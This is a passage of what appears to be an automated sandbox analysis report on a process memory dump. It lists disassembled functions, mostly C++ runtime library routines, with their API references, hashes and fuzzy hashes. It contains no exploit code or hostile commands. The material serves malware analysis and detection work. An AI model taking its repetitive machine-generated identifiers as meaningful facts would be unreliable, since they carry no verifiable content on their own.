                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                              • String ID: $+xv
                                                                                                                                                                                                                              • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                              • Opcode ID: 1ee546047141a26710676b57f3768cf850c13c24f6867c81e6578f1787d77af8
                                                                                                                                                                                                                              • Instruction ID: a1743fa544e4009fdcc979a9eddbbf47ed3a11e46f82f39325fedc2c4005be06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ee546047141a26710676b57f3768cf850c13c24f6867c81e6578f1787d77af8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0221C1B1900B966EDB65DF75C49877BBEF8BB08300F04095EE199C7A42D738E601CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EF3D9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005EF3E0
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EF3EA
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EF48E
                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 005EF499
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 4244582100-1377069549
                                                                                                                                                                                                                              • Opcode ID: 1e134dd545d64a6b986e2d9b6f711fbc2fa67a82256481d1a83e1459b9aed24f
                                                                                                                                                                                                                              • Instruction ID: 0cc378befecd36fe9e8442b311095e34ca19618a7e8801487ce79e72e5b08efb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e134dd545d64a6b986e2d9b6f711fbc2fa67a82256481d1a83e1459b9aed24f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE212834A0065ADFDB18EF15D851A69BB62FF48710F148469E955AB7E1CB30EE50CF80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E6250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(FAB1B776,FAB1B776,?,?,00000000,00624981,000000FF), ref: 005E62EB
                                                                                                                                                                                                                                • Part of subcall function 00602C98: EnterCriticalSection.KERNEL32(0063DD3C,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602CA3
                                                                                                                                                                                                                                • Part of subcall function 00602C98: LeaveCriticalSection.KERNEL32(0063DD3C,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602CE0
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 005E62B0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 005E62B7
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: EnterCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C58
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: LeaveCriticalSection.KERNEL32(0063DD3C,?,?,005E2427,0063E638,00626B40), ref: 00602C8B
                                                                                                                                                                                                                                • Part of subcall function 00602C4E: RtlWakeAllConditionVariable.NTDLL ref: 00602D02
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                              • API String ID: 2056477612-3789238822
                                                                                                                                                                                                                              • Opcode ID: eb05dfd1a047aa502de1f1ddee7032ed29e47ee12c763e1938d666a6e8d4e6e5
                                                                                                                                                                                                                              • Instruction ID: 39e90ed9efb9ba817a5042f0034de423628df1907caca034714486b65539b1e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb05dfd1a047aa502de1f1ddee7032ed29e47ee12c763e1938d666a6e8d4e6e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE11E4B2D04755DFDB14CF54DD06B9AB7A9FB29760F00062AE811932C0E7766900CA91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006069E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00606AA3,?,?,0063DDCC,00000000,?,00606BCE,00000004,InitializeCriticalSectionEx,006297E8,InitializeCriticalSectionEx,00000000), ref: 00606A72
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                              • Opcode ID: e199e90a6f84d3bf404287b23bef489476eca404a43f167d1d64240611667d43
                                                                                                                                                                                                                              • Instruction ID: c910df640a2c079c75cfe12bb5546d7a84124071c51f967b89ffc6391b190c48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e199e90a6f84d3bf404287b23bef489476eca404a43f167d1d64240611667d43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A611E332B80621ABCB36AB68DC45B9B33A6AF01770F144260F914FB3C0D630EE1186D4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F22FA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2301
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F230B
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F235C
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F237C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 8c5a092c24800e2129a26a9438c4912ccd700b391e41e38efa15581e33395685
                                                                                                                                                                                                                              • Instruction ID: faa76b5db336ede4f2e4f26a3e861888fd9710d0a6e9f8aa273645b966894a17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c5a092c24800e2129a26a9438c4912ccd700b391e41e38efa15581e33395685
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D6B590051ADBCB14EB64E809ABE7F76BF80710F240909F615AB3D6CF389E018BD1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ED6BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005ED6C4
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005ED6CE
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005ED71F
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005ED73F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: db785fae6e5986ad7c758b661734c031a381709168bce4cd17154502e0665141
                                                                                                                                                                                                                              • Instruction ID: 17780440a828757e5d3bd1e906789debe6082ab19bb8f6efdd4c8468b29635cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db785fae6e5986ad7c758b661734c031a381709168bce4cd17154502e0665141
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B901C03590056A9BCB19EB6098096BE7F76FF80710F240409E9546B3D2CF349E018BA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ED752 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005ED759
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005ED763
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005ED7B4
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005ED7D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 52dff18b43c02415f8ae0007ac7e3d38bb1ba3d2b32eeb003e3f6bb92d894239
                                                                                                                                                                                                                              • Instruction ID: 02c91eb690e950a513c4af8b5f0dfede938075b6b440eed49739d945d577c0b9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52dff18b43c02415f8ae0007ac7e3d38bb1ba3d2b32eeb003e3f6bb92d894239
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E01C07590016A9BCB18EB6099496BE7FB6FF80310F280509E9556B3D2CF349E01CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F270D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2714
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F271E
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F276F
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F278F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 7df0112a7e1f3854263e91a7be8591dbc2afa6a4317caf9758fc858e5cce9298
                                                                                                                                                                                                                              • Instruction ID: dc2e45367792899cf2224ae9e7a2221e7e998f2fdd941485e63f0734fc1a06cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7df0112a7e1f3854263e91a7be8591dbc2afa6a4317caf9758fc858e5cce9298
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA01C47590111ADBCB18FB60D8096BE7F76BF84710F280509F6146B2D2CF389E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ED7E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005ED7EE
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005ED7F8
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005ED849
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005ED869
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: cdccf72a64ddf82203aa6a46e5536a639f550a0502cea1bbfacc22e438f4721e
                                                                                                                                                                                                                              • Instruction ID: 33b9aa18c68a7844cfac2a130dd07f17fa15f3fc33176af27e4700cc9ba9496f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdccf72a64ddf82203aa6a46e5536a639f550a0502cea1bbfacc22e438f4721e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3101C07290056ADBCB18EB61D84A6BE7FB6BF80720F241409E5556B3D2CF349E018BA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F27A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F27A9
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F27B3
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2804
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2824
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 00e7f571d7a5ac61f1f4a1db534b4a42c04d6c1328bd7ef122ea3a664a4381b1
                                                                                                                                                                                                                              • Instruction ID: 66d862ed228b1656281a95ac9366423a14d59d028cb02d9de783f8a21db83aea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00e7f571d7a5ac61f1f4a1db534b4a42c04d6c1328bd7ef122ea3a664a4381b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801C47590061A9BCB15EB6498096BE7F76BFC4710F240409EA156B3D2CF389E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2837 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F283E
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2848
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2899
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F28B9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 11a78cd18d54bb7ab2fd3a4e909314a89bf4c43b34e545e2bbfe897c3dba7c52
                                                                                                                                                                                                                              • Instruction ID: 8acd3d5ddde162a005e62b36959304b6ff2dcffa03c3cd58190be66a9a27a084
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11a78cd18d54bb7ab2fd3a4e909314a89bf4c43b34e545e2bbfe897c3dba7c52
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB01D67190062EDBCB15EB60D809ABE7F66BFC0750F240509F615AB3D2CF389E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F28CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F28D3
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F28DD
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F292E
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F294E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
